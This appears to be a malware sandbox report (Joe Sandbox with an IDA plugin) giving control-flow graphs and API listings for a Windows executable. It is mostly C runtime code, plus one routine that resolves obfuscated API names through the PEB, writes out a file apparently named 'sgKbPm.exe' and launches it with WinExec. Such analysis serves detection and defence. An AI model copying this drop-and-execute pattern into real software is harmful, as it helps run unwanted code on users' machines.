8654->8657 8659 40bcd4 8655->8659 8656 40bd3b 8658 403763 __read 67 API calls 8656->8658 8660 40bc95 8657->8660 8661 40bd40 8658->8661 8662 403750 __read 67 API calls 8659->8662 8663 4036e8 __read 6 API calls 8660->8663 8664 403750 __read 67 API calls 8661->8664 8665 40bcdb 8662->8665 8663->8667 8664->8665 8669 4036e8 __read 6 API calls 8665->8669 8666->8656 8666->8667 8668 40bd17 8666->8668 8670 40bd5c 8666->8670 8667->8175 8668->8656 8675 40bd22 ReadFile 8668->8675 8669->8667 8672 40398c __malloc_crt 67 API calls 8670->8672 8676 40bd72 8672->8676 8673 40c1c9 GetLastError 8677 40c1d6 8673->8677 8678 40c04f 8673->8678 8674 40be4e 8674->8673 8681 40be62 8674->8681 8675->8673 8675->8674 8679 40bd98 8676->8679 8680 40bd7a 8676->8680 8683 403750 __read 67 API calls 8677->8683 8686 403776 __dosmaperr 67 API calls 8678->8686 8691 40bfd4 8678->8691 8682 409420 __lseeki64_nolock 69 API calls 8679->8682 8684 403750 __read 67 API calls 8680->8684 8681->8691 8701 40be7e 8681->8701 8702 40c094 8681->8702 8682->8675 8685 40c1db 8683->8685 8687 40bd7f 8684->8687 8688 403763 __read 67 API calls 8685->8688 8686->8691 8689 403763 __read 67 API calls 8687->8689 8688->8691 8689->8667 8690 403abd __freea 67 API calls 8690->8667 8691->8667 8691->8690 8692 40c10c ReadFile 8695 40c12b GetLastError 8692->8695 8692->8702 8693 40bee4 ReadFile 8694 40bf02 GetLastError 8693->8694 8693->8701 8694->8701 8695->8702 8697 40c049 GetLastError 8697->8678 8698 40bf61 8698->8691 8699 40bfdc 8698->8699 8700 40bfcf 8698->8700 8704 40bf99 MultiByteToWideChar 8698->8704 8699->8704 8707 409420 __lseeki64_nolock 69 API calls 8699->8707 8703 403750 __read 67 API calls 8700->8703 8701->8693 8701->8698 8705 409420 __lseeki64_nolock 69 API calls 8701->8705 8702->8691 8702->8692 8706 409420 __lseeki64_nolock 69 API calls 8702->8706 8703->8691 8704->8691 8704->8697 8705->8701 8706->8702 8707->8704 8711 40a669 LeaveCriticalSection 8708->8711 8710 40c300 8710->8169 8711->8710 8715 40a669 LeaveCriticalSection 8712->8715 8714 40a1ec 8714->8200 8715->8714 8717 401fd7 8716->8717 8718 401fe9 8716->8718 8717->8207 8721 401f78 8718->8721 8722 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8721->8722 8723 401f8b 8722->8723 8724 401fa5 8723->8724 8726 405444 8723->8726 8724->8207 8727 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8726->8727 8728 405458 8727->8728 8729 405465 8728->8729 8730 406834 __isleadbyte_l 77 API calls 8728->8730 8729->8724 8731 40548d 8730->8731 8732 408b4c ___crtGetStringTypeA 91 API calls 8731->8732 8732->8729 8739 401ca4 8733->8739 8798 4041ef 8736->8798 8740 401d35 8739->8740 8744 401cb8 8739->8744 8741 403750 __read 67 API calls 8740->8741 8742 401e4c 8741->8742 8743 4036e8 __read 6 API calls 8742->8743 8745 4010ff 8742->8745 8743->8745 8744->8740 8748 401d27 8744->8748 8760 40437c 8744->8760 8745->8216 8745->8217 8747 404364 __wincmdln 77 API calls 8747->8748 8748->8747 8756 401da0 8748->8756 8758 401d7f 8748->8758 8749 401e02 8749->8740 8749->8745 8752 401e75 8749->8752 8750 401dbd 8750->8740 8751 401dd8 8750->8751 8754 40437c __cftof 77 API calls 8750->8754 8751->8740 8751->8745 8755 401dec 8751->8755 8753 40437c __cftof 77 API calls 8752->8753 8753->8745 8754->8751 8757 40437c __cftof 77 API calls 8755->8757 8756->8749 8756->8750 8757->8745 8758->8740 8758->8756 8759 40437c __cftof 77 API calls 8758->8759 8759->8756 8763 408379 8760->8763 8764 40838d 8763->8764 8765 408391 8764->8765 8767 4083c4 8764->8767 8766 403750 __read 67 API calls 8765->8766 8790 404394 8765->8790 8768 4083ab 8766->8768 8770 4083f3 8767->8770 8771 4083d5 8767->8771 8767->8790 8769 4036e8 __read 6 API calls 8768->8769 8769->8790 8773 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8770->8773 8772 403750 __read 67 API calls 8771->8772 8774 4083dc 8772->8774 8775 4083fe 8773->8775 8776 4036e8 __read 6 API calls 8774->8776 8777 408406 8775->8777 8779 40841b 8775->8779 8776->8790 8778 408eb6 __NMSG_WRITE 67 API calls 8777->8778 8778->8790 8780 408457 8779->8780 8781 40851f 8779->8781 8783 408496 8780->8783 8784 408489 8780->8784 8795 40434b 8780->8795 8782 408550 8781->8782 8787 40434b __mbsnbcpy_s_l 77 API calls 8781->8787 8781->8790 8788 403750 __read 67 API calls 8782->8788 8782->8790 8786 4084f6 8783->8786 8794 40849c 8783->8794 8784->8782 8784->8783 8789 403750 __read 67 API calls 8786->8789 8787->8781 8788->8790 8791 4084fd 8789->8791 8790->8748 8792 4036e8 __read 6 API calls 8791->8792 8792->8790 8793 40434b __mbsnbcpy_s_l 77 API calls 8793->8794 8794->8790 8794->8793 8796 4042f8 x_ismbbtype_l 77 API calls 8795->8796 8797 40435f 8796->8797 8797->8780 8799 404201 8798->8799 8800 404206 8798->8800 8799->8800 8806 404226 8799->8806 8801 403750 __read 67 API calls 8800->8801 8802 40420b 8801->8802 8803 4036e8 __read 6 API calls 8802->8803 8804 40118b 8803->8804 8804->8225 8805 403750 __read 67 API calls 8805->8802 8807 404276 8806->8807 8809 408362 8806->8809 8807->8804 8807->8805 8812 4082c9 8809->8812 8813 4082f5 8812->8813 8814 4082d9 8812->8814 8816 408317 8813->8816 8817 4082fd 8813->8817 8815 403750 __read 67 API calls 8814->8815 8819 4082de 8815->8819 8821 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8816->8821 8824 4082ee 8816->8824 8818 403750 __read 67 API calls 8817->8818 8820 408302 8818->8820 8822 4036e8 __read 6 API calls 8819->8822 8823 4036e8 __read 6 API calls 8820->8823 8821->8824 8822->8824 8823->8824 8824->8807 8826 40cb86 8825->8826 8827 40cb66 8825->8827 8826->8827 8831 40cb9b 8826->8831 8828 403750 __read 67 API calls 8827->8828 8829 40cb6b 8828->8829 8830 4036e8 __read 6 API calls 8829->8830 8848 40cb7b 8830->8848 8875 40d7b8 8831->8875 8834 40d7b8 __execve 77 API calls 8835 40cbae 8834->8835 8863 40cc2f 8835->8863 8878 40bb06 8835->8878 8836 40d7b8 __execve 77 API calls 8838 40cc50 8836->8838 8839 40cc82 _strlen 8838->8839 8840 40cc56 8838->8840 8846 4039d1 __calloc_crt 67 API calls 8839->8846 8881 40d673 8840->8881 8842 40cbc9 _strlen 8844 4039d1 __calloc_crt 67 API calls 8842->8844 8842->8863 8843 40cc5f 8845 40cc77 8843->8845 8899 40cad7 8843->8899 8849 40cbe4 8844->8849 8845->8848 8851 403abd __freea 67 API calls 8845->8851 8847 40cc97 8846->8847 8847->8848 8852 408f6b _strcpy_s 67 API calls 8847->8852 8848->8244 8849->8848 8853 408f6b _strcpy_s 67 API calls 8849->8853 8851->8848 8854 40ccb3 8852->8854 8855 40cc00 8853->8855 8856 40ccc4 _strlen 8854->8856 8858 4035c0 __invoke_watson 10 API calls 8854->8858 8857 40cc11 8855->8857 8859 4035c0 __invoke_watson 10 API calls 8855->8859 8862 403750 __read 67 API calls 8856->8862 8860 408df6 _strcat_s 67 API calls 8857->8860 8858->8856 8859->8857 8861 40cc1e 8860->8861 8861->8863 8864 4035c0 __invoke_watson 10 API calls 8861->8864 8868 40ccda 8862->8868 8863->8836 8864->8863 8865 408f6b _strcpy_s 67 API calls 8865->8868 8866 4035c0 __invoke_watson 10 API calls 8866->8868 8867 40d673 __waccess_s 69 API calls 8867->8868 8868->8865 8868->8866 8868->8867 8869 40cd2b 8868->8869 8870 40cd29 8868->8870 8871 403750 __read 67 API calls 8869->8871 8874 403abd __freea 67 API calls 8870->8874 8872 40cd30 8871->8872 8873 40cad7 _wcomexecmd 136 API calls 8872->8873 8873->8870 8874->8845 8914 40d6fc 8875->8914 8877 40cba4 8877->8834 8921 40ba4a 8878->8921 8880 40bb18 8880->8842 8882 40d680 8881->8882 8883 40d6a4 8881->8883 8885 403763 __read 67 API calls 8882->8885 8883->8882 8884 40d6ad GetFileAttributesA 8883->8884 8886 40d6d1 8884->8886 8887 40d6bb GetLastError 8884->8887 8888 40d685 8885->8888 8895 403763 __read 67 API calls 8886->8895 8896 40d69c 8886->8896 8889 403776 __dosmaperr 67 API calls 8887->8889 8890 403750 __read 67 API calls 8888->8890 8892 40d6c7 8889->8892 8891 40d68c 8890->8891 8893 4036e8 __read 6 API calls 8891->8893 8894 403750 __read 67 API calls 8892->8894 8893->8896 8894->8896 8897 40d6e4 8895->8897 8896->8843 8898 403750 __read 67 API calls 8897->8898 8898->8892 8900 40cb03 8899->8900 8901 40cae6 8899->8901 8900->8901 8902 40cb08 8900->8902 8903 403750 __read 67 API calls 8901->8903 8928 40d29a 8902->8928 8905 40caeb 8903->8905 8907 4036e8 __read 6 API calls 8905->8907 8908 40cafb 8907->8908 8908->8845 8911 403abd __freea 67 API calls 8912 40cb40 8911->8912 8913 403abd __freea 67 API calls 8912->8913 8913->8908 8915 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8914->8915 8916 40d715 8915->8916 8917 403750 __read 67 API calls 8916->8917 8920 40d731 _strrchr 8916->8920 8918 40d721 8917->8918 8919 4036e8 __read 6 API calls 8918->8919 8919->8920 8920->8877 8922 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8921->8922 8923 40ba5e 8922->8923 8924 403750 __read 67 API calls 8923->8924 8927 40ba7c __mbschr_l 8923->8927 8925 40ba6c 8924->8925 8926 4036e8 __read 6 API calls 8925->8926 8926->8927 8927->8880 8929 40d2e8 _strlen 8928->8929 8930 4039d1 __calloc_crt 67 API calls 8929->8930 8931 40d307 8930->8931 8932 40d312 8931->8932 8933 40d335 8931->8933 8934 403750 __read 67 API calls 8932->8934 9015 40adff 8933->9015 8937 40d31c 8934->8937 8936 40d343 8938 40d34a 8936->8938 8948 40d35e _strlen 8936->8948 8939 403763 __read 67 API calls 8937->8939 8940 4035c0 __invoke_watson 10 API calls 8938->8940 8956 40d359 8938->8956 8947 40d327 8939->8947 8940->8956 8941 403abd __freea 67 API calls 8985 40d3cb 8941->8985 8942 401ee2 setSBUpLow 5 API calls 8943 40cb1e 8942->8943 8943->8908 8986 40d08b 8943->8986 8944 40d3d8 8949 408f6b _strcpy_s 67 API calls 8944->8949 8960 40d3ec _strlen 8944->8960 8947->8942 8948->8944 8952 4063a0 ___crtGetEnvironmentStringsA 76 API calls 8948->8952 8969 40d3f2 _strlen 8948->8969 8951 40d4ec 8949->8951 8951->8960 8953 40d3b4 8952->8953 8953->8956 8953->8969 8954 408f6b _strcpy_s 67 API calls 8954->8960 8956->8941 8957 40d48e 8961 4039d1 __calloc_crt 67 API calls 8957->8961 8958 4035c0 __invoke_watson 10 API calls 8958->8960 8959 40d5c1 8959->8985 8960->8954 8960->8958 8965 40d54d ___crtGetEnvironmentStringsA _strlen 8960->8965 8964 40d499 8961->8964 8962 408f6b _strcpy_s 67 API calls 8962->8965 8964->8944 8965->8959 8965->8962 8972 4035c0 __invoke_watson 10 API calls 8965->8972 8965->8985 8969->8957 9039 40d997 8969->9039 8972->8965 8988 40d0a4 8986->8988 8997 40d0b5 _memset 8986->8997 8987 40d0c1 8989 403763 __read 67 API calls 8987->8989 8988->8987 8988->8997 8990 40d0c6 8989->8990 8991 403750 __read 67 API calls 8990->8991 8993 40d0cd 8991->8993 8992 40d287 8996 403750 __read 67 API calls 8992->8996 8995 4036e8 __read 6 API calls 8993->8995 8994 4039d1 __calloc_crt 67 API calls 8998 40d16a 8994->8998 8999 40cb36 8995->8999 8996->8999 8997->8992 8997->8994 8998->8992 9001 40d177 8998->9001 8999->8911 9000 403763 __read 67 API calls 9002 40d1f9 CreateProcessA GetLastError 9000->9002 9001->9000 9003 403abd __freea 67 API calls 9002->9003 9004 40d22c 9003->9004 9005 40d231 9004->9005 9006 40d23a 9004->9006 9007 403776 __dosmaperr 67 API calls 9005->9007 9008 40d246 9006->9008 9165 4023ea 9006->9165 9007->8999 9010 40d251 WaitForSingleObject GetExitCodeProcess 9008->9010 9011 40d26e 9008->9011 9016 40ae0b ___lock_fhandle 9015->9016 9017 403ef9 __lock 67 API calls 9016->9017 9018 40ae12 9017->9018 9019 40ae26 9018->9019 9022 40ae5c 9018->9022 9020 403750 __read 67 API calls 9019->9020 9021 40ae2b 9020->9021 9023 4036e8 __read 6 API calls 9021->9023 9042 40ad78 9022->9042 9037 40ae3a 9023->9037 9026 40ae64 _strlen 9028 401a9b _calloc 67 API calls 9026->9028 9026->9037 9027 40aed3 ___lock_fhandle 9027->8936 9029 40ae7d 9028->9029 9030 40ae86 9029->9030 9031 40ae9d 9029->9031 9032 403750 __read 67 API calls 9030->9032 9033 408f6b _strcpy_s 67 API calls 9031->9033 9034 40ae8b 9032->9034 9035 40aea7 9033->9035 9036 403750 __read 67 API calls 9034->9036 9035->9037 9038 4035c0 __invoke_watson 10 API calls 9035->9038 9036->9037 9048 40aedc 9037->9048 9038->9037 9129 40d7cf 9039->9129 9043 40ad91 9042->9043 9044 40ad8d 9042->9044 9043->9044 9046 40ada3 _strlen 9043->9046 9051 40b169 9043->9051 9044->9026 9046->9044 9061 40b14f 9046->9061 9128 403e1f LeaveCriticalSection 9048->9128 9050 40aee3 9050->9027 9058 40b1e9 9051->9058 9059 40b184 9051->9059 9052 40b18a WideCharToMultiByte 9052->9058 9052->9059 9053 4039d1 __calloc_crt 67 API calls 9053->9059 9054 40b1ad WideCharToMultiByte 9055 40b1f5 9054->9055 9054->9059 9056 403abd __freea 67 API calls 9055->9056 9056->9058 9058->9046 9059->9052 9059->9053 9059->9054 9059->9058 9060 403abd __freea 67 API calls 9059->9060 9064 40b7aa 9059->9064 9060->9059 9110 40b061 9061->9110 9065 40b7dc 9064->9065 9066 40b7bf 9064->9066 9068 40b83a 9065->9068 9071 40bb06 ___crtsetenv 77 API calls 9065->9071 9067 403750 __read 67 API calls 9066->9067 9069 40b7c4 9067->9069 9070 403750 __read 67 API calls 9068->9070 9072 4036e8 __read 6 API calls 9069->9072 9099 40b7d4 9070->9099 9074 40b7ef 9071->9074 9072->9099 9073 40b81b 9075 40b878 9073->9075 9077 40b84d 9073->9077 9078 40b831 9073->9078 9074->9068 9074->9073 9076 40b750 _copy_environ 67 API calls 9074->9076 9079 40b6fe ___crtsetenv 111 API calls 9075->9079 9075->9099 9076->9073 9082 40398c __malloc_crt 67 API calls 9077->9082 9077->9099 9080 40b169 ___wtomb_environ 120 API calls 9078->9080 9081 40b89c 9079->9081 9084 40b836 9080->9084 9085 40b8f5 9081->9085 9087 40b8a7 9081->9087 9083 40b85d 9082->9083 9083->9075 9090 40398c __malloc_crt 67 API calls 9083->9090 9083->9099 9084->9068 9084->9075 9090->9075 9099->9059 9111 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 9110->9111 9112 40b075 9111->9112 9113 40b096 9112->9113 9114 40b0c9 9112->9114 9124 40b07e 9112->9124 9115 403750 __read 67 API calls 9113->9115 9117 40b0d3 9114->9117 9118 40b0ed 9114->9118 9116 40b09b 9115->9116 9119 4036e8 __read 6 API calls 9116->9119 9120 403750 __read 67 API calls 9117->9120 9121 40b0f5 9118->9121 9122 40b109 9118->9122 9119->9124 9125 40b0d8 9120->9125 9126 40b604 __strnicoll_l 111 API calls 9121->9126 9123 40b5c2 ___crtCompareStringA 100 API calls 9122->9123 9123->9124 9124->9046 9127 4036e8 __read 6 API calls 9125->9127 9126->9124 9127->9124 9128->9050 9168 4022a8 9165->9168 9194 402024 9193->9194 9195 402007 9193->9195 9194->9195 9196 40202b 9194->9196 9197 403750 __read 67 API calls 9195->9197 9199 402793 __output_l 103 API calls 9196->9199 9198 40200c 9197->9198 9200 4036e8 __read 6 API calls 9198->9200 9201 402051 9199->9201 9202 40201c 9200->9202 9201->9202 9204 4054fc 9201->9204 9202->8253 9205 40357f __fileno 67 API calls 9204->9205 9206 40550c 9205->9206 9207 405517 9206->9207 9208 40552e 9206->9208 9209 403750 __read 67 API calls 9207->9209 9210 405532 9208->9210 9213 40553f __stbuf 9208->9213 9211 40551c 9209->9211 9212 403750 __read 67 API calls 9210->9212 9211->9202 9212->9211 9213->9211 9220 40659d __stbuf 67 API calls 9213->9220 9221 405595 9213->9221 9224 4055a0 9213->9224 9214 40562f 9217 40810c __locking 101 API calls 9214->9217 9215 4055af 9216 4055c6 9215->9216 9219 4055e3 9215->9219 9218 40810c __locking 101 API calls 9216->9218 9217->9211 9218->9211 9219->9211 9228 4094a5 9219->9228 9220->9221 9221->9224 9225 4095be 9221->9225 9224->9214 9224->9215 9226 40398c __malloc_crt 67 API calls 9225->9226 9227 4095d3 9226->9227 9227->9224 9229 4094b1 ___lock_fhandle 9228->9229 9230 4094c2 9229->9230 9231 4094de 9229->9231 9233 403763 __read 67 API calls 9230->9233 9232 4094ec 9231->9232 9234 40950d 9231->9234 9235 403763 __read 67 API calls 9232->9235 9236 4094c7 9233->9236 9238 409553 9234->9238 9239 40952d 9234->9239 9237 4094f1 9235->9237 9240 403750 __read 67 API calls 9236->9240 9242 403750 __read 67 API calls 9237->9242 9241 40a5c9 ___lock_fhandle 68 API calls 9238->9241 9243 403763 __read 67 API calls 9239->9243 9251 4094cf ___lock_fhandle 9240->9251 9244 409559 9241->9244 9245 4094f8 9242->9245 9246 409532 9243->9246 9247 409582 9244->9247 9248 409566 9244->9248 9249 4036e8 __read 6 API calls 9245->9249 9250 403750 __read 67 API calls 9246->9250 9253 403750 __read 67 API calls 9247->9253 9252 409420 __lseeki64_nolock 69 API calls 9248->9252 9249->9251 9254 409539 9250->9254 9251->9211 9255 409577 9252->9255 9256 409587 9253->9256 9257 4036e8 __read 6 API calls 9254->9257 9260 4095b4 9255->9260 9258 403763 __read 67 API calls 9256->9258 9257->9251 9258->9255 9263 40a669 LeaveCriticalSection 9260->9263 9262 4095bc 9262->9251 9263->9262 9424 40199d 9431 403d74 9424->9431 9427 4019b0 9429 403abd __freea 67 API calls 9427->9429 9430 4019bb 9429->9430 9444 403c9a 9431->9444 9433 4019a2 9433->9427 9434 403b4b 9433->9434 9435 403b57 ___lock_fhandle 9434->9435 9436 403ef9 __lock 67 API calls 9435->9436 9440 403b63 9436->9440 9437 403bcc 9485 403be1 9437->9485 9439 403bd8 ___lock_fhandle 9439->9427 9440->9437 9441 403ba1 DeleteCriticalSection 9440->9441 9472 40795d 9440->9472 9443 403abd __freea 67 API calls 9441->9443 9443->9440 9445 403ca6 ___lock_fhandle 9444->9445 9446 403ef9 __lock 67 API calls 9445->9446 9452 403cb5 9446->9452 9447 403d4d 9462 403d6b 9447->9462 9450 403d59 ___lock_fhandle 9450->9433 9452->9447 9453 403c52 105 API calls __fflush_nolock 9452->9453 9454 4019fe 9452->9454 9459 403d3c 9452->9459 9453->9452 9455 401a21 EnterCriticalSection 9454->9455 9456 401a0b 9454->9456 9455->9452 9457 403ef9 __lock 67 API calls 9456->9457 9458 401a14 9457->9458 9458->9452 9465 401a6c 9459->9465 9461 403d4a 9461->9452 9471 403e1f LeaveCriticalSection 9462->9471 9464 403d72 9464->9450 9466 401a7c 9465->9466 9467 401a8f LeaveCriticalSection 9465->9467 9470 403e1f LeaveCriticalSection 9466->9470 9467->9461 9469 401a8c 9469->9461 9470->9469 9471->9464 9473 407969 ___lock_fhandle 9472->9473 9474 40799a 9473->9474 9475 40797d 9473->9475 9477 4019bd __lock_file 68 API calls 9474->9477 9482 407992 ___lock_fhandle 9474->9482 9476 403750 __read 67 API calls 9475->9476 9478 407982 9476->9478 9479 4079b2 9477->9479 9480 4036e8 __read 6 API calls 9478->9480 9488 4078e6 9479->9488 9480->9482 9482->9440 9511 403e1f LeaveCriticalSection 9485->9511 9487 403be8 9487->9439 9489 407916 9488->9489 9490 4078fa 9488->9490 9493 403bea __flush 101 API calls 9489->9493 9496 40790f 9489->9496 9491 403750 __read 67 API calls 9490->9491 9492 4078ff 9491->9492 9494 4036e8 __read 6 API calls 9492->9494 9495 407922 9493->9495 9494->9496 9507 40a1ee 9495->9507 9504 4079d1 9496->9504 9499 40357f __fileno 67 API calls 9500 407930 9499->9500 9501 40a121 __close 72 API calls 9500->9501 9502 407936 9501->9502 9502->9496 9503 403abd __freea 67 API calls 9502->9503 9503->9496 9505 401a30 _fprintf 2 API calls 9504->9505 9506 4079d7 9505->9506 9506->9482 9508 40a1fe 9507->9508 9510 40792a 9507->9510 9509 403abd __freea 67 API calls 9508->9509 9508->9510 9509->9510 9510->9499 9511->9487

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 414044-414074 GetPEB 1 414077-41409a 0->1 2 41409d-4140a0 1->2 3 4140a6-4140bc 2->3 4 4141ee-41422b CreateFileA 2->4 5 414110-414116 3->5 6 4140be-4140c5 3->6 21 414265-414269 4->21 22 41422d-414230 4->22 8 414129-41412f 5->8 9 414118-41411f 5->9 6->5 10 4140c7-4140ce 6->10 12 414131-414138 8->12 13 414148-41414e 8->13 9->8 11 414121-414124 9->11 10->5 14 4140d0-4140d7 10->14 16 4141bb-4141c0 11->16 12->13 17 41413a-414141 12->17 18 414150-414157 13->18 19 414167-41416f 13->19 14->5 20 4140d9-4140dd 14->20 24 4141e0-4141e9 16->24 25 4141c2-4141c5 16->25 17->13 23 414143-414146 17->23 18->19 26 414159-414160 18->26 27 414171-414178 19->27 28 414188-41418e 19->28 20->5 29 4140df-4140e3 20->29 32 414232-414238 22->32 23->16 24->2 25->24 33 4141c7-4141ca 25->33 26->19 34 414162-414165 26->34 27->28 35 41417a-414181 27->35 30 414190-414197 28->30 31 4141a7-4141ad 28->31 29->16 36 4140e9-41410b 29->36 30->31 37 414199-4141a0 30->37 31->16 38 4141af-4141b6 31->38 39 414246-414252 WriteFile 32->39 40 41423a-414242 32->40 33->24 41 4141cc-4141cf 33->41 34->16 35->28 42 414183-414186 35->42 36->1 37->31 44 4141a2-4141a5 37->44 38->16 45 4141b8 38->45 47 414255-414262 CloseHandle WinExec 39->47 40->32 46 414244 40->46 41->24 48 4141d1-4141d4 41->48 42->16 44->16 45->16 46->47 47->21 48->24 49 4141d6-4141d9 48->49 49->24 50 4141db-4141de 49->50 50->4 50->24
                              APIs
                              • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
                              • WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
                              • CloseHandle.KERNELBASE(00000000), ref: 00414256
                              • WinExec.KERNEL32(?,00000005), ref: 00414262
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: File$CloseCreateExecHandleWrite
                              • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$sgKbPm.exe
                              • API String ID: 3741012433-895174202
                              • Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
                              • Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
                              • String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
                              • API String ID: 2502740745-3972628896
                              • Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
                              • Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 121 4021b8-4021c9 call 40218d ExitProcess
                              APIs
                              • ___crtCorExitProcess.LIBCMT ref: 004021C0
                                • Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
                                • Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7
                              • ExitProcess.KERNEL32 ref: 004021C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                              • String ID:
                              • API String ID: 2427264223-0
                              • Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
                              • Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 124 4064d7-4064f9 HeapCreate 125 4064fb-4064fc 124->125 126 4064fd-406506 124->126
                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2022705205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2022671348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022728846.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022751942.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022776305.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2022803690.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_yRc7UfFif9.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
                              • Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 127 4023d4-4023e0 call 4022a8 129 4023e5-4023e9 127->129
                              APIs
                              • _doexit.LIBCMT ref: 004023E0
                                • Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
